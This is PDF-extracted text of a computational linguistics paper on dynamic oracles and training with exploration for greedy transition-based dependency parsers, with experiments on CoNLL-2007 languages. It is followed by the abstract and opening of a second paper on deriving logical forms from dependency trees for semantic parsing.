A∪{(li, lb, li+1)}) There is a precondition on LEFTi transitions to only trigger if li−1 6= ROOT. Unlike the arc-eager, arc- standard and hybrid transition systems that work in a left-to-right order and access the sentence in- crementally, the easy-first system is non-directional and has access to the entire sentence at each step. Like the arc-standard and hybrid systems, it builds trees bottom-up. 2.3 Greedy Transition-Based Parsing Assuming that we have a feature-extraction function φ(c,t) over configurations c and transitions t and a weight-vector w assigning weights to each feature, greedy transition-based parsing is very simple and efficient using Algorithm 1. Starting in the initial configuration for a given sentence, we repeatedly choose the highest-scoring transition according to our model and apply it, until we reach a terminal configuration, at which point we stop and return the parse tree accumulated in the configuration. 405 Algorithm 2 Online training of greedy transition- based parsers (ith iteration) 1: for sentence W with gold tree T in corpus do 2: c ← INITIAL(W) 3: while not TERMINAL(c) do 4: CORRECT(c) ←{t |o(t;c,T) = true} 5: tp ← arg maxt∈LEGAL(c) w ·φ(c,t) 6: to ← arg maxt∈CORRECT(c) w ·φ(c,t) 7: if tp 6∈ CORRECT(c) then 8: UPDATE(w,φ(c,to),φ(c,tp)) 9: c ← NEXT(c,to) 10: else 11: c ← tp(c) 3 Training Transition-Based Parsers We now turn to the training of greedy transition- based parsers, starting with a review of the standard method using static oracles and moving on to the idea of training with exploration proposed by Gold- berg and Nivre (2012). 3.1 Training with Static Oracles The standard approach to training greedy transition- based parsers is illustrated in Algorithm 2.3 It as- sumes the existence of an oracle o(t;c,T), which returns true if transition t is correct for configura- tion c and gold tree T . Given this oracle, training is very similar to parsing, but after predicting the next transition tp using the model in line 5 we check if it is contained in the set CORRECT(c) of transitions that are considered correct by the oracle (lines 4 and 7). If the predicted transition tp is not correct, we update the model parameters w away from tp and toward the oracle prediction to, which is the highest- scoring correct transition under the current model, and move on to the next configuration (lines 7–9). If tp is correct, we simply apply it and move to tp(c) without changing the model parameters (line 11). The function NEXT(c,to) in line 9 is used to abstract over a subtle difference in the standard training procedure for the left-to-right systems (arc- eager, arc-standard and hybrid), on the one hand, 3We present the standard approach as an online algorithm in order to ease the transition to the novel approach. While some transition-based parsers use batch learning instead, the essential point is that they explore exactly the same configurations during the training phase. and the easy-first system, on the other. In the former case, NEXT(c,to) evaluates to to(c), which means that we apply the oracle transition to and move on to the next configuration. For the easy-first system, NEXT(c,to) instead evaluates to c, which means that we remain in the same configuration for as many up- dates as necessary to get a correct model prediction. Traditionally, the oracles for the left-to-right sys- tems are static: they return a single correct transition and are only correct for configurations that result from transitions predicted by the oracle itself. The oracle for the easy-first system is non-deterministic and returns a set of correct transitions. However, like the static oracle, it is correct only for configurations from which the gold tree is reachable. Thus, in both cases, we need to make sure that a transition is ap- plied during training only if it is considered correct by the oracle; else we cannot guarantee that later or- acle predictions will be correct. Therefore, on line 9, we either remain in the same configuration (easy- first) or follow the oracle prediction and go to to(c) (left-to-right systems); on line 11, we in fact also go to to(c), because in this case we have tp(c) = to(c). A notable shortcoming of this training procedure is that, at parsing time, the parsing model may pre- dict incorrect transitions and reach configurations that are not on the oracle path. Since the model has never seen such configurations during training, it is likely to perform badly in them, making further mis- takes more likely. We would therefore like the parser to encounter configurations resulting from incorrect transitions during training and learn what constitutes optimal transitions in such configurations. Unfortu- nately, this is not possible using the static (or even the non-deterministic) oracles. 3.2 Training with Exploration Assuming we had access to an oracle that could tell us which transitions are optimal in any configura- tion, including ones from which the gold tree is not reachable, we could trivially change the training al- gorithm to incorporate learning on configurations that result from incorrect transitions, and thereby mitigate the effects of error propagation at pars- ing time. Conceptually, all that we need to change is line 9. Instead of following the prediction tp only when it is correct (line 11), we could some- times choose to follow tp also when it is not correct. 406 Algorithm 3 Online training with exploration for greedy transition-based parsers (ith iteration) 1: for sentence W with gold tree T in corpus do 2: c ← INITIAL(W) 3: while not TERMINAL(c) do 4: CORRECT(c) ←{t|o(t;c,T) = true} 5: tp ← arg maxt∈LEGAL(c) w ·φ(c,t) 6: to ← arg maxt∈CORRECT(c) w ·φ(c,t) 7: if tp 6∈ CORRECT(c) then 8: UPDATE(w,φ(c,to),φ(c,tp)) 9: c ← EXPLOREk,p(c,to, tp, i) 10: else 11: c ← tp(c) 1: function EXPLOREk,p(c, to, tp, i) 2: if i > k and RAND() < p then 3: return tp(c) 4: else 5: return NEXT(c,to) The rest of the training algorithm does not need to change, as the set CORRECT(c) obtained in line 4 would now include the set of optimal transitions to take from configurations reached by following the incorrect transition, as provided by the new oracle. Following Goldberg and Nivre (2012), we call this approach learning with exploration. The modified training procedure is specified in Algorithm 3. There are three major questions that need to be answered when implementing a concrete version of this algorithm: Exploration Policy When do we follow an incor- rect transition, and which one do we follow? Optimality What constitutes an optimal transition in configurations from which the gold tree is not reachable? Oracle Given a definition of optimality, how do we calculate the set of optimal transitions in a given configuration? The first two questions are independent of the spe- cific transition system. In our experiments, we use a simple exploration policy, parameterized by an it- eration number k and a probability p. This policy always chooses an oracle transition during the first k iterations but later chooses the oracle transition with probability 1−p and the (possibly incorrect) model prediction otherwise. This is defined in the function EXPLOREk,p(c,to, tp, i) (called in line 9 of Algo- rithm 3), which takes two additional arguments com- pared to Algorithm 2: the model prediction tp and the current training iteration i. If i exceeds the iter- ation threshold k and if a randomly generated prob- ability does not exceed the probability threshold p, then the function returns tp(c), which means that we follow the (incorrect) model prediction. Otherwise, it reverts to the old NEXT(c,to) function, returning c for easy-first and to(c) for the other systems. We show in Section 5 that the training procedure is rel- atively insensitive to the choice of k and p values as long as predicted transitions are chosen often. Our optimality criterion is directly related to the attachment score metrics commonly used to evaluate dependency parsers.4 We say that a transition t is optimal in a configuration c if and only if the best achievable attachment score from t(c) is equal to the best achievable attachment score from c. The implementation of oracles is specific to each transition system. In the next section, we first provide a characterization of complete non- deterministic oracles, also called dynamic oracles, which is what we require for the training procedure in Algorithm 3. We then define a property of tran- sition systems which we call arc decomposition and present a general method for deriving complete non- deterministic oracles for arc-decomposable systems. Finally, we use this method to derive concrete ora- cles for the arc-eager, hybrid and easy-first systems, which are all arc-decomposable. In Section 5, we then show experimentally that we indeed achieve better parsing accuracy when using exploration dur- ing training. 4 Oracles for Transition-Based Parsing Almost all greedy transition-based parsers described in the literature are trained using what we call static oracles. We now make this notion precise and con- trast it with non-deterministic and complete oracles. Following the terminology of Goldberg and Nivre 4The labeled attachment score (LAS) is the percentage of words in a sentence that are assigned both the correct head and the correct label. The unlabeled attachment score (UAS) is the percentage of words that are assigned the correct head (regard- less of label). 407 (2012), we reserve the term dynamic oracles for or- acles that are both non-deterministic and complete. 4.1 Characterizing Oracles During training, we assume that the oracle is a boolean function o(t;c,T), which returns true if and only if transition t is correct in configuration c for gold tree T (cf. Algorithms 2–3). However, such a function may be defined in terms of different un- derlying functions that we also call oracles. A static oracle is a function os(T) mapping a tree T to a sequence of transitions t1, . . . , tn. A static oracle is correct if starting in the initial con- figuration and applying the transitions in os(T) in order results in the transition system reaching a terminating configuration with parse tree T . For- mally, a static oracle is correct if and only if, for every projective dependency tree T with yield W , os(T) = t1, . . . , tn, c = tn(. . .(t1(INITIAL(W)))), TERMINAL(c) and Ac = T .5 When using a static oracle for training in Algorithm 2, the function o(t;c,T) returns true if os(T) = t1, . . . , tn, c = ti−1(. . .(t1(INITIAL(W)))) (for some i, 1 ≤ i ≤ n) and t = ti. If t 6= ti, o(t;c,T) = false; if c 6= ti−1(. . .(t1(INITIAL(W)))) (for all i, 1 ≤ i ≤ n), o(t;c,T) is undefined. A static oracle is therefore essentially incomplete, because it is only defined for configurations that are part of the oracle path.6 Static oracles either allow a single transition at a given con- figuration, or are undefined for that configuration. By contrast, a non-deterministic oracle is a func- tion on(c,T) mapping a configuration c and a tree T to a set of transitions. A non-deterministic ora- cle is correct if and only if, for every projective de- pendency tree T , every configuration c from which T is reachable, and every transition t ∈ on(c,T), t(c) is a configuration from which T is still reach- able. Note that this definition of correctness for non-deterministic oracles is restricted to configura- tions from which a goal tree is reachable. Non- 5Since all the transition systems considered in this paper are restricted to projective dependency trees, we only define cor- rectness with respect to this class. There are obvious general- izations that apply to more expressive transition systems. 6Static oracles are usually described as rules over parser configurations, i.e., “if the configuration is X take transition Y”, giving the impressions they are functions from configurations to transitions. However, as explained here, these rules are only correct if the sequence of transitions is followed in its entirety. deterministic oracles are more flexible than static oracles in that they allow for spurious ambiguity: they support the possibility of different sequences of transitions leading to the gold tree. However, they are still only guaranteed to be correct on a subset of the possible configurations. Thus, when using a non-deterministic oracle for training in Algorithm 2, the function o(t;c,T) returns true if T is reachable from c and t ∈ on(c,T). However, if T is not reachable from c, o(t;c,T) is not necessarily well- defined. A complete non-deterministic oracle is a function od(c,T) for which this restriction is removed, so that correctness is defined over all configurations that are reachable from the initial configuration. Follow- ing Goldberg and Nivre (2012), we call complete non-deterministic oracles dynamic. In order to de- fine correctness for dynamic oracles, we must first introduce a cost function C(A,T), which measures the cost of outputting parse A when the gold tree is T . In this paper, we define cost as Hamming loss (for labeled or unlabeled dependency arcs), which is directly related to the attachment score metrics used to evaluate dependency parsers, but other cost functions are conceivable. We say that a complete non-deterministic oracle is correct if and only if, for every projective dependency tree T with yield W , every configuration c that is reachable from INITIAL(W), and every transition t ∈ od(c,T), minA:c;A C(A,T) = minA:t(c);A C(A,T), where c ; A signifies that the parse A is reachable from c, a notion that will be formally defined in the next subsection. In other words, even if the gold tree T is no longer reachable itself, the best tree reachable from t(c) has the same cost as the best tree reachable from c. In addition to a cost function for arc sets and trees, it is convenient to define a cost function for transi- tions. We define C(t;c,T) to be the difference in cost between the best tree reachable from t(c) and c, respectively. That is: C(t;c,T) = min A:t(c);A C(A,T)− min A:c;A C(A,T) A dynamic oracle can then be defined as an oracle that returns the set of transitions with zero cost: od(c,T) = {t | C(t;C,T) = 0} 408 4.2 Arc Reachability and Arc Decomposition We now define the notion of reachability for parses (or arc sets), used already in the previous subsec- tion, and relate it to reachability for individual de- pendency arcs. This enables us to define a prop- erty of transition systems called arc decomposition, which is very useful when deriving dynamic oracles. Arc Reachability We say that a dependency arc (h,d)7 is reachable from a configuration c, writ- ten c ; (h,d), if there is a (possibly empty) se- quence of transitions t1, . . . , tk such that (h,d) ∈ A(tk(...t1(c))). In words, we require a sequence of transitions starting from c and leading to a configu- ration whose arc set contains (h,d). Arc Set Reachability A set of dependency arcs A = {(h1,d1), . . . ,(hn,dn)} is reachable from a configuration c, written c ; A, if there is a (pos- sibly empty) sequence of transitions t1, . . . , tk such that A ⊆ A(tk(...t1(c))). In words, there is a sequence of transitions starting from c and leading to a config- uration where all arcs in A have been derived. Tree Consistency A set of arcs A is said to be tree consistent if there exists a projective dependency tree T such that A ⊆ T . Arc Decomposition A transition system is said to be arc decomposable if, for every tree consistent arc set A and configuration c, c ; A is entailed by c ; (h,d) for every arc (h,d) ∈ A. In words, if every arc in a tree consistent arc set is reachable from a configuration, then the entire arc set is also reachable from that configuration. Arc decomposition is a powerful property, allowing us to reduce reasoning about the reachability of arc sets or trees to reasoning about the reachability of individual arcs, and will later use this property to derive dynamic oracles for the arc-eager, hybrid and easy-first systems. 7We consider unlabeled arcs here in order to keep notation simple. Everything is trivially extendable to the labeled case. 4.3 Proving Arc Decomposition Let us now sketch how arc decomposition can be proven for the transition systems in consideration. Arc-Eager For the arc-eager system, consider an arbitrary configuration c = (σ,β,A) and a tree- consistent arc set A′ such that all arcs are reachable from c. We can partition A′ into four sets, each of which is by necessity itself a tree-consistent arc-set: (1) B = {(h,d) |h,d 6∈ β} (2) B = {(h,d) |h,d ∈ β} (3) Bh = {(h,d) |h ∈ β,d ∈ σ} (4) Bd = {(h,d) |d ∈ β,h ∈ σ} Arcs in B are already in A and cannot interfere with other arcs. B is reachable by any sequence of transi- tions that derives a tree consistent with B for a sen- tence containing only the words in β. In deriving this tree, every node x involved in some arc in Bh or Bd must at least once be at the head of the buffer. Let cx be the first such configuaration. From cx, every arc (x,d) ∈ Bh can be derived without in- terfering with arcs in A′ by a sequence of REDUCE and LEFT-ARClb transitions. This sequence of tran- sitions will trivially not interfere with other arcs in Bh. Moreover, it will not interfere with arcs in Bd because A′ is tree consistent and projectivity ensures that an arc of the form (y,z) (y ∈ σ,z ∈ β) must satisfy y < d < x ≤ z. Finally, it will not inter- fere with arcs in B because the buffer remains un- changed. After deriving every arc (x,d) ∈ Bh, we remain with at most one (h,x) ∈ Bd (because of the single-head constraint). By the same reasoning as above, a sequence of REDUCE and LEFT-ARClb transitions will take us to a configuration where h is on top of the stack without interfering with arcs in A′. We can then derive the arc (h,x) using RIGHT-ARClb. This does not interfere with arcs re- maining in Bh or Bd because all such arcs must have their buffer node further down the buffer (due to pro- jectivity). At this point, we have reached a configu- ration cx+1 to which the same reasoning applies for the next node x + 1. Hybrid The proof for the hybrid system is very similar but with a slightly different partitioning be- cause of the bottom-up order and the different way of handling right-arcs. 409 Easy-First For the easy-first system, we only need to partition arcs into L = {(h,d) |d 6∈ λ} and L = {(h,d) |h,d ∈ λ}. The former must already be in A, and for the latter there can be no conflict between arcs as long as we respect the bottom-up ordering. Arc-Standard Unfortunately, arc decomposition does not hold for the arc-standard system. To see why, consider a configuration with the stack σ = a,b,c. The arc (c,b) is reachable via LEFT, the arc (b,a) is reachable via RIGHT, LEFT, the arc set A = {(c,b),(b,a)} forms a projective tree and is thus tree consistent, but it is easy to convince oneself that A is not reachable from this configuration. The reason that the above proof technique fails for the arc-standard system is that the arc set correspond- ing to B in the arc-eager system may involve arcs where both nodes are still on the stack, and we can- not guarantee that all projective trees consistent with these arcs can be derived. In the very similar hybrid system, such arcs exist as well but they are limited to arcs of the form (h,d) where h < d and h and d are adjacent on the stack, and this restriction is sufficient to restore arc decomposition. 4.4 Deriving Oracles We now present a procedure for deriving a dynamic oracle for any arc-decomposable system. First of all, we can define a non-deterministic oracle as follows: on(c,T) = {t | t(c) ; T} That is, we allow all transitions after which the goal tree is still reachable. Note that if c ; T holds, then the set returned by the oracle is guaranteed to be non-empty. For a sound and complete transition system, we know that INITIAL(W) ; T for any projective dependency tree with yield W , and the or- acle is guaranteed to return a non-empty set as long as we are not in the terminal configuration and have followed transitions suggested by the oracle. In order to extend the non-deterministic oracle to a dynamic oracle, we make use of the transition cost function introduced earlier: od(c,T) = {t | C(t;c,T) = 0} As already mentioned, we assume here that the cost is the difference in Hamming loss between the best tree reachable before and after the transition.8 As- suming arc decomposition, this is equivalent to the number of gold arcs that are reachable before but not after the transition. For configurations from which T is reachable, the dynamic oracle coincides with the non-deterministic oracle. But for configurations from which T cannot be derived, the dynamic ora- cle returns transitions leading to the best parse A (in terms of Hamming distance from T ) which is reach- able from c. This is the behavior expected from a dynamic oracle, as defined in Section 4.1. Thus, in order to derive a dynamic oracle for an arc-decomposable transition system, it is sufficient to show that the transition cost function C(t;c,T) can be computed efficiently for that system.9 Next we show how to do this for the arc-eager, hybrid and easy-first systems. 4.5 Concrete Oracles In a given transition system, the set of individually reachable arcs is relatively straightforward to com- pute. In an arc-decomposable system, we know that any intersection of the set of individually reachable arcs with a projective tree is tree consistent, and therefore also reachable. In particular, this holds for the goal tree. For such systems, we can therefore compute the transition cost by intersecting the set of arcs that are individually reachable from a config- uration with the goal arc set, and see how a given transition affects this set of reachable arcs. Arc-Eager In the arc-eager system, an arc (h,d) is reachable from a configuration c if one of the following conditions hold: (1) (h,d) is already derived ((h,d) ∈ Ac); (2) h and d are in the buffer; (3) h is on the stack and d is in the buffer; (4) d is on the stack and is not assigned a head and h is in the buffer. 8The framework is easily adapted to a different cost function such as weighted Hamming cost, where different gold arcs are weighted differently. 9In fact, in order to use the dynamic oracle with our current learning algorithm, we do not need the full power of the cost function: it is sufficient to distinguish between transitions with zero cost and transitions with non-zero cost. 410 The cost function for a configuration of the form c = (σ|s,b|β,A)10 can be calculated as follows:11 • C(LEFT;c,T): Adding the arc (b,s) and pop- ping s from the stack means that s will not be able to acquire any head or dependents in β. The cost is therefore the number of arcs in T of the form (k,s) or (s,k) such that k ∈ β. Note that the cost is 0 for the trivial case where (b,s) ∈ T , but also for the case where b is not the gold head of s but the real head is not in β (due to an erroneous previous transition) and there are no gold dependents of s in β. • C(RIGHT;c,T): Adding the arc (s,b) and pushing b onto the stack means that b will not be able to acquire any head in σ or β, nor any dependents in σ. The cost is therefore the num- ber of arcs in T of the form (k,b), such that k ∈ σ ∪ β, or of the form (b,k) such that k ∈ σ and there is no arc (x,k) in Ac. Note again that the cost is 0 for the trivial case where (s,b) ∈ T , but also for the case where s is not the gold head of b but the real head is not in σ or β (due to an erroneous previous transition) and there are no gold dependents of b in σ. • C(REDUCE;c,T): Popping s from the stack means that s will not be able to acquire any de- pendents in B = b|β. The cost is therefore the number of arcs in T of the form (s,k) such that k ∈ B. While it may seem that a gold arc of the form (k,s) should be accounted for as well, note that a gold arc of that form, if it exists, is already accounted for by a previous (erroneous) RIGHT transition when s acquired its head. • C(SHIFT;c,T): Pushing b onto the stack means that b will not be able to acquire any head or dependents in S = s|σ. The cost is therefore the number of arcs in T of the form (k,b) or (b,k) such that k ∈ S and (for the second case) there is no arc (x,k) in Ac. 10This is a slight abuse of notation, since for the SHIFT tran- sition s may not exist, and for the REDUCE transition b may not exist. 11While very similar to the presentation in Goldberg and Nivre (2012), this version includes a small correction to the RIGHT and SHIFT transitions. Hybrid In the hybrid system, an arc (h,d) is reachable from a configuration c if one of the fol- lowing conditions holds: (1) (h,d) is already derived ((h,d) ∈ Ac); (2) h and d are in the buffer; (3) h is on the stack and d is in the buffer; (4) d is on the stack and h is in the buffer; (5) d is in stack location i, h is in stack loca- tion i − 1 (that is, the stack has the form σ = . . . ,h,d, . . .). The cost function for a configuration of the form c = (σ|s1|s0,b|β,A)12 can be calculated as follows: • C(LEFT;c,T): Adding the arc (b,s0) and pop- ping s0 from the stack means that s0 will not be able to acquire heads from H = {s1}∪ β and will not be able to acquire dependents from D = {b}∪β. The cost is therefore the number of arcs in T of the form (s0,d) and (h,s0) for h ∈ H and d ∈ D. • C(RIGHT;c,T): Adding the arc (s1,s0) and popping s0 from the stack means that s0 will not be able to acquire heads or dependents from B = {b}∪β. The cost is therefore the number of arcs in T of the form (s0,d) and (h,s0) for h,d ∈ B. • C(SHIFT;c,T): Pushing b onto the stack means that b will not be able to acquire heads from H = {s1}∪σ, and will not be able to acquire dependents from D = {s0,s1}∪ σ. The cost is therefore the number of arcs in T of the form (b,d) and (h,b) for h ∈ H and d ∈ D. Easy-First In the easy-first system, an arc (h,d) is reachable from a configuration c if one of the fol- lowing conditions holds: (1) (h,d) is already derived ((h,d) ∈ Ac); (2) h and d are in the list λ. When adding an arc (h,d), d is removed from the list λ and cannot participate in any future arcs. Thus, a transition has a cost > 0 with respect to a tree T if one of the following holds: 12Note again that s0 may be missing in the case of SHIFT case and s1 in the case of SHIFT and LEFT. 411 0 .3 .6 .9 0 1 2 3 4 5 arabic 81.62 83.88 0 .3 .6 .9 0 1 2 3 4 5 basque 75.19 76.18 0 .3 .6 .9 0 1 2 3 4 5 catalan 91.24 92.10 0 .3 .6 .9 0 1 2 3 4 5 chinese 84.84 85.89 0 .3 .6 .9 0 1 2 3 4 5 czech 79.03 80.37 0 .3 .6 .9 0 1 2 3 4 5 english 86.29 88.69 0 .3 .6 .9 0 1 2 3 4 5 greek 79.36 81.19 0 .3 .6 .9 0 1 2 3 4 5 hungarian 76.35 77.58 0 .3 .6 .9 0 1 2 3 4 5 italian 84.01 84.51 0 .3 .6 .9 0 1 2 3 4 5 turkish 77.02 77.67 Figure 1: Effect of k (y axis) and p (x axis) values on parsing accuracies for the arc-eager system on the various CoNLL-2007 shared-task languages. Each point is an average UAS of 5 runs with different seeds. The general trend is that smaller k and higher p are better. (1) it adds an arc (h,d) such that (h′,d) ∈ T for some h′ ∈ λ, h′ 6= h; (2) it adds an arc (h,d) such that (d,d′) ∈ T for some d′ ∈ λ. The exact cost can be calculated by counting the number of such arcs. 5 Experiments and Results Setup, data and parameters The goal of our ex- periments is to evaluate the utility of the dynamic oracles for training, by comparing a training sce- nario which only sees configurations that can lead to the gold tree (following a static oracle for the left-to-right systems and a non-deterministic but in- complete oracle for the easy-first system), against a training scenario that involves exploration of incor- rect states, using the dynamic oracles. As our training algorithm involves a random com- ponent (we shuffle the sentences prior to each itera- tion, and randomly select whether to follow a cor- rect or incorrect action), we evaluate each setup five times using different random seeds, and report the averaged results. We perform all of the experiments on the multi- lingual CoNLL-2007 data sets. We use 15 training iterations for the left-to-right parsers, and 20 training iterations for the easy-first parser. We use the stan- dard perceptron update as our update rule in training, and use the averaged weight vector for prediction in test time. The feature sets differ by transition sys- tem but are kept the same across data sets. The ex- act feature-set definitions for the different systems are available in the accompanying software, which is available on line at the first author’s homepage. Effect of exploration parameters In an initial set of experiments, we investigate the effect of the ex- ploration parameters k and p on the arc-eager sys- tem. The results are presented in Figure 1. While the optimal parameters vary by data set, there is a clear trend toward lower values of k and higher values of p. This is consistent with the report of Goldberg and Nivre (2012) who used a fixed small value of k and large value of p throughout their experiments. Training with exploration for the various systems For the second experiment, in which we compared training with a static oracle to training with explo- ration, we fixed the exploration parameters to k = 1 and p = 0.9 for all data sets and transition-system combinations. The results in terms of labeled accu- racies (for the left-to-right systems) and unlabeled accuracies (for all systems) are presented in Table 1. Training with exploration using the dynamic oracles yields improved accuracy for the vast majority of the setups. The notable exceptions are the arc-eager and easy-first systems for unlabeled Italian and the arc- hybrid system in Catalan, where we observe a small drop in accuracy. However, we can safely conclude that training with exploration is beneficial and note that we may get even further gains in the future using better methods for tuning the exploration parameters or better training methods. 412 system / language hungarian chinese greek czech basque catalan english turkish arabic italian UAS eager:static 76.42 85.01 79.53 78.70 75.14 91.30 86.10 77.38 81.59 84.40 eager:dynamic 77.48 85.89 80.98 80.25 75.97 92.02 88.69 77.39 83.62 84.30 hybrid:static 76.39 84.96 79.40 79.71 73.18 91.30 86.43 75.91 83.43 83.43 hybrid:dynamic 77.54 85.10 80.49 80.07 73.70 91.06 87.62 76.90 84.04 83.83 easyfirst:static 81.27 87.01 81.28 82.00 75.01 92.50 88.57 78.92 82.73 85.31 easyfirst:dynamic 81.52 87.48 82.25 82.39 75.87 92.85 89.41 79.29 83.70 85.11 LAS eager:static 66.72 81.24 72.44 71.08 65.34 86.02 84.93 66.59 72.10 80.17 eager:dynamic 68.41 82.23 73.81 72.99 66.63 86.93 87.69 67.05 73.92 80.43 hybrid:static 66.54 80.17 70.99 71.88 62.84 85.57 84.96 64.80 73.16 78.78 hybrid:dynamic 68.05 80.59 72.07 72.15 63.52 85.47 86.28 66.12 74.10 79.25 Table 1: Results on the CoNLL 2007 data set. UAS, including punctuation. Each number is an average over 5 runs with different randomization seeds. All experiments used the same exploration parameters of k=1, p=0.9. 6 Related Work The error propagation problem for greedy transition- based parsing was diagnosed by McDonald and Nivre (2007) and has been tackled with a variety of techniques including parser stacking (Nivre and Mc- Donald, 2008; Martins et al., 2008) and beam search and structured prediction (Zhang and Clark, 2008; Zhang and Nivre, 2011). The technique called boot- strapping in Choi and Palmer (2011) is similar in spirit to training with exploration but is applied iter- atively in batch mode and is only approximate due to the use of static oracles. Dynamic oracles were first explored by Goldberg and Nivre (2012). In machine learning more generally, our approach can be seen as a problem-specific instance of imita- tion learning (Abbeel and Ng, 2004; Vlachos, 2012; He et al., 2012; Daumé III et al., 2009; Ross et al., 2011), where the dynamic oracle is used to im- plement the optimal expert needed in the imitation learning setup. Indeed, our training procedure is closely related to DAgger (Ross et al., 2011), which also trains a classifier to match an expert on a dis- tribution of possibly suboptimal states obtained by running the system itself. Our training procedure can be viewed as an online version of DAgger (He et al., 2012) with two extensions: First, our learn- ing algorithm involves a stochastic policy parame- terized by k, p for choosing between the oracle or the model prediction, whereas DAgger always fol- lows the system’s own prediction (essentially run- ning with k = 0, p = 1). The heatmaps in Figure 1 show that this parameterization is beneficial. Sec- ond, while DAgger assumes an expert providing a single label at each state, our oracle is nondetermin- istic and allows multiple correct labels (transitions) which our training procedure tie-breaks according to the model’s current prediction, a technique that has recently been proposed in an extension to DAgger by He et al. (2012). Other related approaches in the machine learning literature include stacked sequen- tial learning (Cohen and Carvalho, 2005), LaSO (Daumé III and Marcu, 2005), Searn (Daumé III et al., 2009) and SMILe (Ross and Bagnell, 2010). 7 Conclusion In this paper, we have extended the work on dynamic oracles presented in Goldberg and Nivre (2012) in several directions by giving formal characterizations of non-deterministic and complete oracles, defining the arc-decomposition property for transition sys- tems, and using this property to derive novel com- plete non-deterministic oracles for the hybrid and easy-first systems (as well as a corrected oracle for the arc-eager system). We have then used the com- pleteness of these new oracles to improve the train- ing procedure of greedy parsers to include explo- rations of configurations which result from incor- rect transitions. For all three transition systems, we get substantial accuracy improvements on many lan- guages. As the changes all take place at training time, the very fast running time of the greedy algo- rithm at test time is maintained. 413 References Pieter Abbeel and Andrew Y Ng. 2004. Apprenticeship learning via inverse reinforcement learning. In Pro- ceedings of the 21st International Conference on Ma- chine Learning (ICML), page 1. Jinho D. Choi and Martha Palmer. 2011. Getting the most out of transition-based dependency parsing. In Proceedings of the 49th Annual Meeting of the Asso- ciation for Computational Linguistics: Human Lan- guage Technologies, pages 687–692. William W. Cohen and Vitor R. Carvalho. 2005. Stacked sequential learning. In Proceedings of the Inter- national Joint Conference on Artificial Intelligence, pages 671–676. Hal Daumé III and Daniel Marcu. 2005. Learning as search optimization: Approximate large margin meth- ods for structured prediction. In Proceedings of the 22nd International Conference on Machine Learning, pages 169–176. Hal Daumé III, John Langford, and Daniel Marcu. 2009. Search-based structured prediction. Machine Learn- ing, 75:297–325. Yoav Goldberg and Michael Elhadad. 2010. An effi- cient algorithm for easy-first non-directional depen- dency parsing. In Human Language Technologies: The 2010 Annual Conference of the North American Chapter of the Association for Computational Linguis- tics (NAACL HLT), pages 742–750. Yoav Goldberg and Joakim Nivre. 2012. A dynamic or- acle for arc-eager dependency parsing. In Proceed- ings of the 24th International Conference on Compu- tational Linguistics (COLING), pages 959–976. He He, Hal Daumé III, and Jason Eisner. 2012. Imitation learning by coaching. In Advances in Neural Informa- tion Processing Systems 25. Liang Huang and Kenji Sagae. 2010. Dynamic program- ming for linear-time incremental parsing. In Proceed- ings of the 48th Annual Meeting of the Association for Computational Linguistics (ACL), pages 1077–1086. Terry Koo and Michael Collins. 2010. Efficient third- order dependency parsers. In Proceedings of the 48th Annual Meeting of the Association for Computational Linguistics (ACL), pages 1–11. Marco Kuhlmann, Carlos Gómez-Rodrı́guez, and Gior- gio Satta. 2011. Dynamic programming algorithms for transition-based dependency parsers. In Proceed- ings of the 49th Annual Meeting of the Association for Computational Linguistics (ACL), pages 673–682. André Filipe Martins, Dipanjan Das, Noah A. Smith, and Eric P. Xing. 2008. Stacking dependency parsers. In Proceedings of the Conference on Empirical Meth- ods in Natural Language Processing (EMNLP), pages 157–166. Ryan McDonald and Joakim Nivre. 2007. Charac- terizing the errors of data-driven dependency parsing models. In Proceedings of the 2007 Joint Conference on Empirical Methods in Natural Language Process- ing and Computational Natural Language Learning (EMNLP-CoNLL), pages 122–131. Ryan McDonald, Koby Crammer, and Fernando Pereira. 2005. Online large-margin training of dependency parsers. In Proceedings of the 43rd Annual Meeting of the Association for Computational Linguistics (ACL), pages 91–98. Joakim Nivre and Ryan McDonald. 2008. Integrating graph-based and transition-based dependency parsers. In Proceedings of the 46th Annual Meeting of the As- sociation for Computational Linguistics (ACL), pages 950–958. Joakim Nivre. 2003. An efficient algorithm for pro- jective dependency parsing. In Proceedings of the 8th International Workshop on Parsing Technologies (IWPT), pages 149–160. Joakim Nivre. 2004. Incrementality in deterministic de- pendency parsing. In Proceedings of the Workshop on Incremental Parsing: Bringing Engineering and Cog- nition Together (ACL), pages 50–57. Joakim Nivre. 2008. Algorithms for deterministic incre- mental dependency parsing. Computational Linguis- tics, 34:513–553. Stéphane Ross and J. Andrew Bagnell. 2010. Efficient reductions for imitation learning. In Proceedings of the 13th International Conference on Artificial Intelli- gence and Statistics, pages 661–668. Stéphane Ross, Geoffrey J. Gordon, and J. Andrew Bag- nell. 2011. A reduction of imitation learning and structured prediction to no-regret online learning. In Proceedings of the 14th International Conference on Artificial Intelligence and Statistics, pages 627–635. Andreas Vlachos. 2012. An investigation of imitation learning algorithms for structured prediction. In Pro- ceedings of the European Workshop on Reinforcement Learning (EWRL), pages 143–154. Yue Zhang and Stephen Clark. 2008. A tale of two parsers: Investigating and combining graph-based and transition-based dependency parsing. In Proceedings of the Conference on Empirical Methods in Natural Language Processing (EMNLP), pages 562–571. Yue Zhang and Joakim Nivre. 2011. Transition-based dependency parsing with rich non-local features. In Proceedings of the 49th Annual Meeting of the Asso- ciation for Computational Linguistics: Human Lan- guage Technologies, pages 188–193. 414 work_spwpktmrkjellmefa22h7vbnp4 ---- Transforming Dependency Structures to Logical Forms for Semantic Parsing Siva Reddy†a Oscar Täckström‡ Michael Collins‡b Tom Kwiatkowski‡ Dipanjan Das‡ Mark Steedman† Mirella Lapata† †ILCC, School of Informatics, University of Edinburgh ‡ Google, New York siva.reddy@ed.ac.uk {oscart, mjcollins, tomkwiat, dipanjand}@google.com {steedman, mlap}@inf.ed.ac.uk Abstract The strongly typed syntax of grammar for- malisms such as CCG, TAG, LFG and HPSG offers a synchronous framework for deriving syntactic structures and semantic logical forms. In contrast—partly due to the lack of a strong type system—dependency structures are easy to annotate and have become a widely used form of syntactic analysis for many languages. However, the lack of a type system makes a formal mechanism for deriving logical forms from dependency structures challenging. We address this by introducing a robust system based on the lambda calculus for deriving neo- Davidsonian logical forms from dependency trees. These logical forms are then used for semantic parsing of natural language to Free- base. Experiments on the Free917 and Web- Questions datasets show that our representation is superior to the original dependency trees and that it outperforms a CCG-based representa- tion on this task. Compared to prior work, we obtain the strongest result to date on Free917 and competitive results on WebQuestions. 1 Introduction Semantic parsers map sentences onto logical forms that can be used to query databases (Zettlemoyer and Collins, 2005; Wong and Mooney, 2006), 